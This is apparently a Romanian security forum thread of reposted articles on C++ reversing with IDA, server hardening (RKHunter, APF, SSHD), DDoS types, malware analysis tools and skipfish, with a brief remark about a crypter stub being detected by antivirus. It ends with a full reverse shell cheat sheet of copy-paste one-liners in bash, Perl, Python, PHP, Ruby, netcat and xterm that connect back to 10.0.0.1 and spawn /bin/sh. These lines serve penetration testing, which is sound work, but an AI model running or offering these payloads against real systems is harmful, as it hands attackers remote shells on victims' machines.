Nytro

Da, este un fel de versiune imbunatatita a acestuia, dar parca l-am refacut de la 0. Uite Selenity CMS, e un fel de ultima versiune. Il gasesti si aici la RST Power. http://www65.zippyshare.com/v/1073349/file.html Screenshot AdminCP: http://i56.tinypic.com/2ccs4s8.jpg

Pe mine nu ma deranjeaza sa fiu filmat daca ma descurc si iese bine

Trebuie sa facem ceva, ce putem, orice.

E de cel putin 3 ani, arata urat si nu are mai deloc optiuni. Deci nu are rost... Nici nu stiu daca il mai am.

Eu o sa vin

Nu stiu ce ai scanat tu... http://www.virustotal.com/file-scan/report.html?id=5228eae4b11ceed3fad19e591b5c800433783503e615560f0739d4f91e4a2d9b-1315512955 Si asta e cu un fisier simplu si inofensiv cryptat, pentru ca stub-ul e detectabil.

Reversing C++ programs with IDA pro and Hex-rays Introduction During my holidays, I had plenty of time to study and reverse a program, which was completely coded in C++. This was the first time I seriously studied a C++ codebase, using IDA as the only source of information, and found it quite hard. Here’s a sample of what you get with Hex-rays when you start up digging into an interesting function: v81 = 9; v63 = *(_DWORD *)(v62 + 88); if ( v63 ) { v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))(v63 + 24); if ( v64 ) v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD *)(v3 + 40), bstrString); } It’s our job to add symbol names, identify classes and set up all the information to help hex-rays in giving us a reliable and certainly understandable output: padding = *Dst; if ( padding < 4 ) return -1; buffer_skip_bytes(this2->decrypted_input_buffer, 5u); buffer_skip_end(this2->decrypted_input_buffer, padding); if ( this2->encrypt_in != null ) { if ( this2->compression_in != null ) { buffer_reinit(this2->compression_buffer_in); packet_decompress(this2, this2->decrypted_input_buffer, this2->compression_buffer_in); buffer_reinit(this2->decrypted_input_buffer); avail_len = buffer_avail_bytes(this2->compression_buffer_in); ptr = buffer_get_data_ptr(this2->compression_buffer_in); buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len); } } packet_type = buffer_get_u8(this2->decrypted_input_buffer); *len = buffer_avail_bytes(this2->decrypted_input_buffer); this2->packet_len = 0; return packet_type; Of course, Hex-rays is not going to invent the names for you, you’ll still have to make sense of the code and what it means to you, but at least, being able to give a name to the classes will certainly help. All my samples here have been compiled either with visual studio or Gnu C++. I have found the results to be similar, even if they may not be compatible. Fix it for your compiler of interest. Structure of a C++ program It is not my goal to teach you how OOP works, you already know that. We’ll just see how it works (and is implemented) in the big lines. Class = data structure + code (methods). The data structure can only be seen in the source code, when the methods will appear in your favorite disassembler. Object = memory allocation + data + virtual functions. The object is an instantiation of a class, and something you can observe in IDA. An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and a destructor. You will see accesses to its member variables (embedded objects) and maybe calls to virtual functions. Virtual functions are silly: it is hard to know, without running the program with breakpoints, what code is going to be executed at runtime (and disassemble it). Member variables are a bit easier: they work like their counterpart in C (structs), and IDA has a very handy tool to declare structures, and hex-rays handles them very well in the disassembly. Let’s go back to the bits and bytes. Object creation int __cdecl sub_80486E4() { void *v0; // ebx@1 v0 = (void *)operator new(8); sub_8048846(v0); (**(void (__cdecl ***)(void *))v0)(v0); if ( v0 ) (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0); return 0; } Here’s the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn’t mean we have 8 bytes of variables. The function sub_8048846 called just after the new() takes the pointer as parameter, and certainly is the constructor. The next function call is a little cryptic. It’s doing two pointer deferences on v0 before calling it. It’s a virtual function call. All polymorphic objects have a special pointer in their variables, called the vtable. This table contains addresses of all the virtual methods, so the C++ program can call them when needed. In the compilers I could test, this vtable is always the first element of an object, and always stays at the same place, even in subclasses. (This could no stay true for multiple inheritance. I did not test). Let’s do some IDA magic: Rename the symbols Just click on a name, press « n » and give a meaningful name. Since we don’t know yet what our class do, I suggest we name the class « class1 », and use this convention until we’ve understood what our class do. It’s very possible that we’re going to discover other classes before we finished digging class1, so I suggest we simply continue naming classes as we find them. int __cdecl main() { void *v0; // ebx@1 v0 = (void *)operator new(8); class1::ctor(v0); (**(void (__cdecl ***)(void *))v0)(v0); if ( v0 ) (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0); return 0; } Create structures The « structures » window of IDA is very useful. Type Shift-F9 to make it appear. I suggest you pull it off (in the QT IDA version) and put it on the right of the IDA window, so you can see both the decompile window and the structures. Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that’s what we got here ! Now, we’re going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result. Create a new structure, of 12 bytes, and call it « class1_vtable ». At this state, we cannot really know how big that vtable is, but changing the structure size is very easy. Click on « vtable » in class1’s declaration, and type « y ». Now, declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic. We can rename the few methods to « method1 » to « method3 ». Method3 is certainly the destructor. Depending on the programming convention and the compiler used, the first method often is the destructor, but here’s a counterexample. It is time to analyze the constructor. Analysis of the constructor int __cdecl class1::ctor(void *a1) { sub_80487B8(a1); *(_DWORD *)a1 = &off_8048A38; return puts("B:()"); } You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class. « sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent-class. « off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big is our vtable (just watch the next pointer that has an Xref), and a list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes. It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn’t provide anything you can’t see in the classic view. The strange call in the constructor int __cdecl sub_80487B8(int a1) { int result; // eax@1 *(_DWORD *)a1 = &off_8048A50; puts("A::A()"); result = a1; *(_DWORD *)(a1 + 4) = 42; return result; } The call to the « sub_80487b8() » function in the constructor reveals us the same type of function: a virtual function table pointer is put in the vtable member, and a puts() tells us we’re in yet another constructor. Don’t retype the type « class1 » for argument « a1 », since we’re not dealing with class1. We found a new class, that we will call « class2 ». This class is a superclass of class1. Let’s do the same work as in class1. The only difference it that we do not know exactly the size of its member. There are two ways of figuring it out: Look at the xrefs of class2 ::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members. Look at the methods in the vtable, and try to guess what’s the highest member ever accessed. In our case, « class2 ::ctor » accesses the 4 bytes after the 4 first ones and set it to 42. Since its child-class « class1 » is 8 bytes long, so is « class2 ». Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children. Study of the destructors Let’s go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let’s study it. if ( v0 ) ((void (__cdecl *)(class1 *)) v0->vtable->method_3)(v0); … void __cdecl class1::m3(class1 *a1) { class1::m2(a1); operator delete(a1); } … void __cdecl class1::m2(class1 *a1) { a1->vtable = (class1_vtable *)&class1__vtable; puts("B::~B()"); class2::m2((class2 *)a1); } … void __cdecl class2::m2(class2 *a1) { a1->vtable = (class2_vtable *)&class2__vtable; puts("A::~A()"); } What we can see here is the following: class1 ::m3 is a destructor, which calls class1 ::m2 which is the main destructor of class1. What this destructor do is ensure that we’re well in « class1 » context, by setting back the vtable to is « class1 » state. It then calls the destructor of « class2 », which also sets the vtable to « class2 » context. This method can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes in the way. Hey, what are all these casts? Why do I have two structures defining the same fields? What we have here is exactly the same problem that you get when doing OOP with C : You end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields: For each class, define a classXX_members, classXX_vtable, classXX structure. classXX contains +++ vtable (typed to classXX_vtable *) +++ classXX-1_members (members of the superclass) +++ classXX_members, if any classXX_vtable contains +++classXX-1_vtable +++classXX’s vptrs, if any Ideally, you should start from the main class to the children, until you end up in an edge class. In our exemple, here’s the « solution » of our sample: 00000000 class1 struc ; (sizeof=0x8) 00000000 vtable dd ? ; offset 00000004 class2_members class2_members ? 00000008 class1 ends 00000008 00000000 ; ----------------------------------------------00000000 00000000 class1_members struc ; (sizeof=0x0) 00000000 class1_members ends 00000000 00000000 ; ----------------------------------------------00000000 00000000 class1_vtable struc ; (sizeof=0xC) 00000000 class2_vtable class2_vtable ? 0000000C class1_vtable ends 0000000C 00000000 ; ----------------------------------------------00000000 00000000 class2 struc ; (sizeof=0x8) 00000000 vtable dd ? ; offset 00000004 members class2_members ? 00000008 class2 ends 00000008 00000000 ; ----------------------------------------------00000000 00000000 class2_vtable struc ; (sizeof=0xC) 00000000 method_1 dd ? ; offset 00000004 dtor dd ? ; offset 00000008 delete dd ? ; offset 0000000C class2_vtable ends 0000000C 00000000 ; ----------------------------------------------00000000 00000000 class2_members struc ; (sizeof=0x4) 00000000 field_0 dd ? 00000004 class2_members ends 00000004 int __cdecl main() { class1 *v0; // ebx@1 v0 = (class1 *)operator new(8); class1::ctor(v0); ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.method_1)(v0); if ( v0 ) ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.delete)(v0); return 0; } int __cdecl class1::ctor(class1 *a1) { class2::ctor((class2 *)a1); a1->vtable = (class1_vtable *)&class1__vtable; return puts("B:()"); } class2 *__cdecl class2::ctor(class2 *a1) { class2 *result; // eax@1 a1->vtable = (class2_vtable *)&class2__vtable; puts("A::A()"); result = a1; a1->members.field_0 = 42; return result; } In brief When you find a new class, give a symbolic name, and resolve the whole tree before figuring out what should be its real name Start from the ancestor and go up to the children Look at the constructors and destructors first, check out the references to new() and static methods. Often, the methods of a same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other. Sometimes, the constructors are inlined in childclasses constructors, or even at the place of the instantiation. If you want to spare time when reversing huge inherited structures, use the struct inclusion trick to name variable only once. Use and abuse Hex-rays’ typing system, it’s very powerful. Pure virtual classes are hell : you can find several classes having similar vtables, but no code in common. Beware of them. Sources Try this at home ! The binary (elf32 stripped) The source file. Don’t open it too fast ! Sursa: Reversing C++ programs with IDA pro and Hex-rays at Aris' Blog - Computers, ssh and rock'n roll

Hardening Windows Applications olleB - olle @ toolcrypt.org About this document This paper is aimed at Windows developers in the hope of explaining how Windows' security features can be used to better secure their applications. It is not a complete guide to the Windows security model and may skip details that were deemed unimportant at the time of writing. Please bear that in mind while reading. Thank you. Introduction to Windows security In this introductory chapter some basic concepts of the Windows security model are explained in just enough detail to understand the material presented in the following chapters. If you are already familiar with how the Windows model of access control works, feel free to skip ahead and use this chapter for reference only. Another great reference is the MSDN section on Access Control available at Access Control (Windows). Download: https://media.blackhat.com/bh-us-10/whitepapers/olleb/BlackHat-USA-2010-olleb-Hardening-Windows-Applications-wp.pdf

Install RKHunter Product Name: RKHunter Product Version: 1.3.6 Homepage: Rootkit.nl - Protect your machine Description: rkhunter (Rootkit Hunter) is a Unix-based tool that scans for rootkits, backdoors and possible local exploits. It does this by comparing MD5 hashes of important files with known good ones in online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD. Step 1: Downloading, Installing and Updateing cd /usr/local/src wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz.sha1.txt sha1sum -c rkhunter-1.3.6.tar.gz.sha1.txt tar -zxvf rkhunter-1.3.6.tar.gz cd rkhunter-1.3.6 ./installer.sh --layout default --install /usr/local/bin/rkhunter --update /usr/local/bin/rkhunter --propupd rm -Rf /usr/local/src/rkhunter* cd Step 2: Adding daily cron job Step 2.1: Create run-file nano -w /etc/cron.daily/rkhunter.sh Step 2.2: Add this text to rkhunter.sh #!/bin/sh ( /usr/local/bin/rkhunter --versioncheck /usr/local/bin/rkhunter --update /usr/local/bin/rkhunter --cronjob --report-warnings-only ) | /bin/mail -s 'rkhunter Daily Run (PutYourServerNameHere)' your@email.here REMEMBER TO CHANGE (PutYourServerNameHere) AND your@email.here Step 2.3: Chmod rkhunter.sh to root only chmod 700 /etc/cron.daily/rkhunter.sh There you go! should be installed, and you will get a mail daily with a status on your system Sursa: Install RKHunter | SecureCentos.com

Install Firewall Guide for installing CSF Firewall will come later.. APF is used because its the site admins favorite, and its stable and simple to setup. Might be better for new guys? Fuel for discussion Product Name: APF (Advanced Firewall Policy) Product Version: 0.9.7 rev:1 Homepage: Advanced Policy Firewall | R-fx Networks Description: Advanced Policy Firewall (APF) is an iptables(netfilter) based firewall system designed around the essential needs of todays Internet deployed servers and the unique needs of custom deployed Linux installations. The configuration of APF is designed to be very informative and present the user with an easy to follow process, from top to bottom of the configuration file. The management of APF on a day-to-day basis is conducted from the command line with the apf command, which includes detailed usage information and all the features one would expect from a current and forward thinking firewall solution. Pre Setup: Make sure iptables are installed yum install iptables* -y Step 1: Download, unpack, install of APF from source. cd /usr/local/src wget http://www.rfxn.com/downloads/apf-current.tar.gz tar -zxf apf-current.tar.gz cd apf-9* ./install.sh Step 1.1: Cleanup source install files. rm -Rf /usr/local/src/apf-9* && cd Step 2: Backup orginal apf config cp /etc/apf/conf.apf /etc/apf/conf.apf.bak Step 3: Edit current APF Config nano -w /etc/apf/conf.apf Change: * RAB="0" to RAB="1" * RAB_PSCAN_LEVEL="2" to RAB_PSCAN_LEVEL="3" * TCR_PASS="1" to TCR_PASS="0" * DLIST_PHP="0" to DLIST_PHP="1" * DLIST_SPAMHAUS="0" to DLIST_SPAMHAUS="1" * DLIST_DSHIELD="0" to DLIST_DSHIELD="1" * DLIST_RESERVED="0" to DLIST_RESERVED="1" Step 3.1: Find IFACE_IN= and IFACE_OUT= in /etc/apf/conf.apf and verify that they match your network interface Step 3.2: Locate HELPER_SSH_PORT=”22? and change it to your SSH port IF you changed it in your sshd_config: Step 3.3: Locate IG_TCP_CPORTS=”22? and change it to your SSH port IF you changed it in your sshd_config: REMEMBER MAKE SURE YOU TO CHANGE YOUR SSHD PORT IN APF, IF YOU CHANGED IT IN SSHD_CONFIG You can run this command “cat /etc/ssh/sshd_config |grep Port” to see what port your SSHD uses Step 4: Restart the APF /usr/local/sbin/apf -r Step 5: Now relogin though ssh again, to verify that you still can login into your server Step 6: When your happy with your firewall and everything works fine, Edit /apf.conf find DEVEL_MODE=”1? and change it to DEVEL_MODE=”0? Step 7: Restart APF again /usr/local/sbin/apf -r Step 8: Make sure APF starts automatic after restart chkconfig --add apf chkconfig --level 345 apf on You should NOW have a firewall up and running! Enjoy Port setting example for different Hosting control panels: Directadmin: IG_TCP_CPORTS=”21,22,25,53,80,110,111,143,443,587,953,2222,3306,32769? IG_UDP_CPORTS=”53,111,631,724,5353,32768,32809? EGF=”1? EG_TCP_CPORTS=”21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089? EG_UDP_CPORTS=”20,21,37,53,873? Cpanel: IG_TCP_CPORTS=”20,21,22,25,26,53,80,110,143,443,465,993,995,2082,2083,2086,2087,2095,2096? IG_UDP_CPORTS=”21,53,873? EGF=”1? EG_TCP_CPORTS=”21,22,25,26,27,37,43,53,80,110,113,443,465,873,2089? EG_UDP_CPORTS=”20,21,37,53,873? Troubleshooting: Problem: If you get this error apf(xxxxx): {glob} unable to load iptables module (ip_tables), aborting. Solution: Try changing SET_MONOKERN=”0? to SET_MONOKERN=”1? , then apf -r Problem: If you get this message: apf(xxxxx): {glob} !!DEVELOPMENT MODE ENABLED!! – firewall will flush every 5 minutes. Solution: you need to change DEVEL_MODE=1 to DEVEL_MODE=0, make sure your config is working first. Sursa: Install Firewall | SecureCentos.com

Hardening SSHD Step 1: First of all we need to make a regular user, since we are disabling direct root login: adduser admin && passwd admin Step 2: Backup your current sshd_config mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bak Step 3: Create a new sshd_config file nano -w /etc/ssh/sshd_config Step 3.1: Paste this code into the new file ## Change to other port is recommended, etc 2488 Port 22 ## Sets listening address on server. default=0.0.0.0 #ListenAddress 192.168.0.1 ## Enforcing SSH Protocol 2 only Protocol 2 ## Disable direct root login, with no you need to login with admin user, then "su -" you into root PermitRootLogin no ## UsePrivilegeSeparation yes ## AllowTcpForwarding no ## Disables X11Forwarding X11Forwarding no ## Checks users on their home directority and rhosts, that they arent world-writable StrictModes yes ## The option IgnoreRhosts specifies whether rhosts or shosts files should not be used in authentication IgnoreRhosts yes ## HostbasedAuthentication no ## RhostsAuthentication specifies whether sshd can try to use rhosts based authentication. RhostsRSAAuthentication no ## Adds a login banner that the user can see Banner /etc/motd ## Enable / Disable sftp server #Subsystem sftp /usr/libexec/openssh/sftp-server ## Add users that are allowed to log in AllowUsers admin Control + X to save Step 4: Verify settings in the sshd_config you created nano -w /etc/ssh/sshd_config REMEMBER YOU SHOULD CHANGE THE PORT TO SOMETHING ELSE. ( Example Port 2488 ) Step 5.1: Add text to MOTD Banner file (/etc/motd) nano -w /etc/motd Step 5.2: Add this text, or something else of your choice Private system, please log off. Step 6: Restart the SSHD Daemon service sshd restart Step 7: Start a NEW client, and test that you can connect on new port. (DO NOT CLOSE CURRENT SSH CLIENT INCASE OF PROBLEMS) Sursa: Hardening SSHD | SecureCentos.com

Taxonomy of DDoS Attacks Property of RioRey, Inc. © 2009 - 2011 1. SYN Flood. Clients generate a SYN packet (64 bytes) to request a new session from a host server. As the TCP three-way communication handshake is created, the host will track and allocate each of the client’s sessions until the session is closed. In a SYN flood, a victim server receives spoofed SYN requests at a high packet rate that contain fake source IP addresses. The SYN flood overwhelms the victim server by depleting its system resources (connection table memory) normally used to store and process these incoming packets, resulting in performance degradation or a complete server shutdown. A well-crafted SYN flood often fools deep-packet inspection filtering techniques. SYN-Cookie defense can be used to defend against large-scale SYN floods but this requires all servers to support this capability. 2. SYN-ACK Flood. Host servers generate SYN-ACK packets in response to incoming SYN requests from clients. During a SYN-ACK flood, the victim server receives spoofed SYN-ACK packets at a high packet rate. This flood exhausts a victim’s server by depleting its system resources (memory, CPU, etc.) used to compute this irregularity, resulting in performance degradation or a complete server shutdown. 3. ACK & PUSH ACK Flood. After a TCP-SYN session is established between a host and a client, ACK or PUSH ACK packets are used to communicate information back and forth between the two until the session is closed. During an ACK flood, a victim receives spoofed ACK packets at a high packet rate that fail to belong to any session within the server’s connection list. The ACK flood exhausts a victim’s server by depleting its system resources (memory, CPU, etc.) used to match these incoming packets, resulting in performance degradation or a complete server shutdown. ........................................................................................ Download: http://www.riorey.com/x-resources/2011/RioRey_Taxonomy_DDoS_Attacks_2.2_2011.pdf

Introduction to Malware & Malware Analysis by Rajesh Nikam Introduction Reverse engineering is the process of analyzing a subject system to identify the system's components and their relationships, and to create representations of the system in another form or at a higher level of abstraction. The process of reverse engineering, which is part of malware analysis, is accomplished using specific tools that are categorized as hex editors, disassemblers/debuggers, decompiles and monitoring tools. Disassemblers/debuggers occupy important position in the list of reverse engineering tools. A disassembler converts binary code into assembly code. Disassemblers also extract strings, used libraries, and imported and exported functions. Debuggers expand the functionality of disassemblers by supporting the viewing of the stack, the CPU registers, and the hex dumping of the program as it executes. Debuggers allow breakpoints to be set and the assembly code to be edited at runtime. One must be familiar with the Portable Executable (PE)[1]file format before diving into reverse engineering for Windows executables. In this article we will get into important aspects of Hiew, OllyDbg and IDA Pro from reverse engineer's perspective. Hiew Hiew[2] short for Hacker's view is a great disassembler (not that this is not debugger) designed for hackers, asthe name suggests. It supports three modes - Text, Hexadecimal and Decode (Dis-assembly) mode. Enter/F4 key is used to switch between these modes. In each mode the Function Line, corresponding to function keys from F1 to F12, which appears at the bottom of the Hiew screen, changes and its functionality with CTRL, SHIFT and ALT combinations. PE Header PE Header could be viewed by pressing F8 from Hex or Decode view. In this mode we could see important properties of PE file using following shortcuts: F6 Sections Table F7 Import Table F9 Export Table F10 Data Directories F5 Jump to Entry Point Alt-F2 Jump to end of last section Search in file Hiew supports to search in a file for ASCII or HEX sequence of bytes by pressing F7 key. It also supports byte wild character. Alt-? Wild character Shift-F7 To repeat search Alt-F7 To change search direction Strings ASCII and Unicode strings are viewed from Text/Hex mode by pressing Alt-F6 key. This helps to search for juicy strings like suspicious urls, FTP, SMTP or IRC commands, files names, registry keys etc in the file. You could jump to selected string from string window by pressing ENTER key. +/- keys are used to change the minimum length of displayed strings, this will help to filter out smaller strings. You could apply filter for displayed strings using F9 key. Moving around You could directly jump to specific location by pressing F5 key and providing offset (offset values are hexadecimal?). To specify relative offset + or - sign could be used as prefix to offset. When specified offset is a Virtual Address, it should start with ".". Alt-F1 key is used to toggle between Virtual Address and file offset. If you want jump to specific function or offset which appears as part of control transfer instruction like call, jmp or conditional jump, you could press the key that appears at the end of instruction. Please see Fig.1 marked for label 4. In this case if you press key “4”, it will take you to offset 0x010073DA. 0 or Backspace key is used to jump back the previous instruction. Simple Decryption Hiew supports decryption of block using simple encryptions like xor, add, rol etc. Press F3 from Hex or Decode view to enter in edit mode and then press F7 to add simple decryption routine. You could set operand size as byte, word or dword by pressing F2. Hiew works great when used in combination with File Manager like FAR[3] by configuring its command line. This is very helpful disassembler to quickly get different aspects of file under analysis like file header, section information, data directories, imported / exported functions and strings. OllyDbg OllyDbg[4][5]is an application-level debugger. OllyDbg interface shows the disassembly, hex dump, stack, and CPU registers. Additionally, OllyDbg supports run tracing, conditional breakpoints, PE header viewing, hex editing, and plug-in support. At first Startup, OllyDbg asks to setup User Data Directory (UDD) and Plugins directory.UDD is used to keep debugged application specific information like breakpoints and other information and obviously you need to save plugins in Plugins directory. It provides wide Debugging Options like break on new module or when thread is created, how to process exceptions etc. OllyDbg supports setting of Hardware Breakpoints, Software Breakpoints, Memory Breakpoints and even Conditional Breakpoints. OllyDbg supports plugins to enhance its functionality. Olly Advanced Plugin There were some bugs reported with Olly v1.10 related to string parsing routine, parsing of faulty executables. This plugin fixes most of these bugs. Some malware samples are loaded with Anti-Debugging techniques [7], Olly Advanced plugin helps to counter most of them. Olly DumpPlugin Olly Dump is used to dump debugged process memory. You could trace the packed file till it reaches original entry point and then dump unpacked version of file from process memory. It provides options to rebuild Import Address Table (IAT). Olly ScriptPlugin OllyScriptis a plugin to that lets you to automate OllyDbg by writing scripts in an assembly-like language. Many tasks involve a lot of repetitive work just to get to some point in the debugged application. By using this plugin you could write a script once and it could be used with other similar samples. OpenRCE[8]hosts dozens of scripts that helpful to find original entry point (OEP) of many packers. IDA Pro IDA Pro is a powerful disassembler that presents the disassembly in well-organized format, shows Graph view of selected function. However, it is less frequently used as a debugger in reverse engineers community where OllyDbg steals the top rank. IDA Pro's features include hex editing, string extraction, and import and export viewing. IDA Pro also features a window for viewing all of the functions called by a program, and provides accurate analyses of the program, summarizing them in a color-coded bar at the top of the screen, which classifies the various sections of the program's code. Below figure shows IDA Pro's interface, including the disassembly and the color-coded analysis bar at the top of the screen. The titles of the other windows are visible on the tabs above the disassembly. IDA Pro supports wide variety of processors like ARM, DEC, Intel, Motorola etc. IDA Pro provides selection of debuggers • Bochs • Win Debugger • GDB • WinDbg IDA Pro with Boch semulator make an interesting combination that is used to debug Operating system starting from booting process and it is helpful in debugging even ROM BIOS and Master Boot Record code. Analysis done on particular sample, comments added, functions marked could be saved as an .idb file. IDA Shortcuts Below is the list of some important IDA Shortcuts, for complete list please visit reference [9]. Enter Goto address or variable Esc Go back to previous location ; Add inline comment INSERT | SHIFT ; Add comment N Rename label, variable, functions etc. X Show cross reference M Substitute enum CTRL W *Dont forget to* Save changes Extending IDA IDA supports writing IDC Scripts which is very similar to C like language on top of powerful IDA disassembler. The functionality of disassembler could be utilized even through python scripts and by writing plugins. FLIRT Fast Library Identification and Recognition Technology One of the challenges with disassembly of programs developed with modern high level languages is to identify library functions. One may end up in spending considerable time to go through these functions. On the other hand identification of library functions can considerably ease the analysis of a program. IDA comes with FLIRT to recognize the standard library functions. One must understand the power of each tool to choose appropriate tool for specific requirement during reverse engineering. References 1. Portable Executable File Format – A Reverse Engineer View Tuts 4 You: Downloads / Portable Executable Format (PE) / Portable Executable File Format 2. Hiew Hiew homepage 3. FAR Manager Far Manager Official Site : main 4. OllyDbg OllyDbg v1.10 5. OllyDbg Quick Start Guide Tuts 4 You: Downloads / OllyDbg Tutorials / OllyDbg Quick Start Guide 6. OllyDbg Plugins OpenRCE 7. Anti-Debugging http://lilxam.free.fr/repo/hacking/Windows%20Anti-Debug%20Reference.pdf 8. Olly Scripts OpenRCE 9. IDA Shortcuts http://www.hex-rays.com/idapro/freefiles/IDA_Pro_Shortcuts.pdf Sursa: Tools for Reverse Engineering and Malware Analysis | ClubHACK Magazine

Hijacking Facebook Fan Pages It's easier to hijack a Facebook page than you would expect, because of sloppy security from the social network. The question is - will Facebook do anything about it? Video: http://www.securitytube.net/video/2210 Cu alte cuvinte: daca esti administrator pe o pagina, poti scoate ceilalti administratori, administratorii "originali".

Java 7 Officially Released Published: 2011-09-05, Last Updated: 2011-09-05 13:44:59 UTC by Raul Siles (Version: 2) Oracle officially released Java 7, including some security updates and several new features and enhancements. Thanks ISC reader Alex for notifying us about it. The new Java 7 version coexists with the latest Java 6 Update 27 version and is available for download from the Oracle web site, Oracle Technology Network for Java Developers, and still makes use of different installers for the 32 and 64-bit versions for all operating systems (Linux, Solaris & Windows). As you can see in the release notes, the main security enhancements affect the JSSE (Java Secure Socket Extension) and TLS communications, including TLS v1.1 and v1.2 as well as Server Name Indication (SNI) support. Java 7 does not remove any previous Java versions; I guess this is the intended behavior as this is a major release. From a security perspective, if Java 7 is installed (using Windows as the sample platform) on a system that already has Java 6 installed, both versions will remain, so if you only want to run the latest version, ensure you uninstall any previous versions (as we had to do in the past but with the same major release) and do not leave vulnerable Java 6 releases around. Considering Java is one of the most targeted pieces of client software today, be ready for future updates on both, Java 6 and Java 7 in your IT environments (perhaps Java 6u28 and Java 7u1), and plan in advance how to manage them. UPDATE 1: Let's clarify this diary post title a little bit based on txISO comment (thanks!). If you consider Java to be officially released only when it is available at java.com, then Java has not been officially released yet (see quote on 3rd comment below). However, if you consider that Java 7 is available out there, not only in its JDK version (what I consider the version for developers), but the JRE (Java Runtime Environment) version too, then IMHO, it has been released - although only at oracle.com. Besides that, if you are old Java school and go to the old java.sun.com, you will be redirected to the oracle.com page where Java 7 is available to the public. For our ISC audience, officially or not, get ready for Java 7 as soon as possible: it is out there Sursa: ISC Diary | Java 7 Officially Released

skipfish A fully automated, active web application security reconnaissance tool. Key features: High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets. Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion. Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors. The tool is believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments. Docs: SkipfishDoc - skipfish - Project documentation - web application security scanner - Google Project Hosting Primer: lcamtuf's blog: Understanding and using skipfish Download: http://skipfish.googlecode.com/files/skipfish-2.03b.tgz Sursa: skipfish - web application security scanner - Google Project Hosting

Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former. Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”. Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable. Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 PERL Here’s a shorter, feature-free version of the perl-reverse-shell: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' There’s also an alternative PERL revere shell here. Python This was tested under Linux / Python 2.7: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6… php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' If you want a .php file to upload, see the more featureful and robust php-reverse-shell. Ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. nc -e /bin/sh 10.0.0.1 1234 If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f xterm One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. xterm -display 10.0.0.1:1 To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1 You’ll need to authorise the target to connect to you (command also run on your host): xhost +targetip Sursa: Reverse Shell Cheat Sheet | pentestmonkey

